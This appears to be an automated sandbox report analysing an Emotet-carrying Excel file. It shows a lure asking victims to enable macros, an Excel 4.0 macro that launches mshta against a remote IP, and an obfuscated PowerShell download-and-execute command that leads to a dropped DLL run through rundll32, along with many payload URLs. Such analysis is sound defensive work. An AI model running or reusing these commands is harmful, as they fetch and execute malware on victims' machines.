Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 91.240.118.172 91.240.118.172

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 19:58:55 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44affaa0ef=1643399935; expires=Fri, 28-Jan-2022 19:59:55 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 19:58:55 GMTExpires: Fri, 28 Jan 2022 19:58:55 GMTContent-Disposition: attachment; filename="Fw6A4ZWhOBNhoQZNE5.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,2

Source: global traffic

HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172

Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comi equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410097515.0000000000380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: imedpub_8.xls.0.dr	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.412420079.000000000285D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.411930557.0000000002855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlr
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.661371984.00000000000C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.410185425.000000000310D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436631636.00000000030E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: hostfeeling.com

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31 32 33 34 35 36 3
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 8	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26

Found malicious Excel 4.0 Macro

Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta

Document contains OLE streams with names of living off the land binaries

Source: imedpub_8.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: imedpub_8.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: imedpub_8.xls	Initial sample: EXEC
Source: imedpub_8.xls	Initial sample: EXEC

Source: imedpub_8.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: 32B4.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE
Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: imedpub_8.xls	OLE indicator, VBA macros: true
Source: imedpub_8.xls.0.dr	OLE indicator, VBA macros: true

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P. .............................P. .....................`I.........v.....................K......(.e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k....................................}..v....(.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k..... ..............................}..v............0...............(.e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......e.............................}..v............0.................e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k......e.............................}..v....@.......0...............8.e.............................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
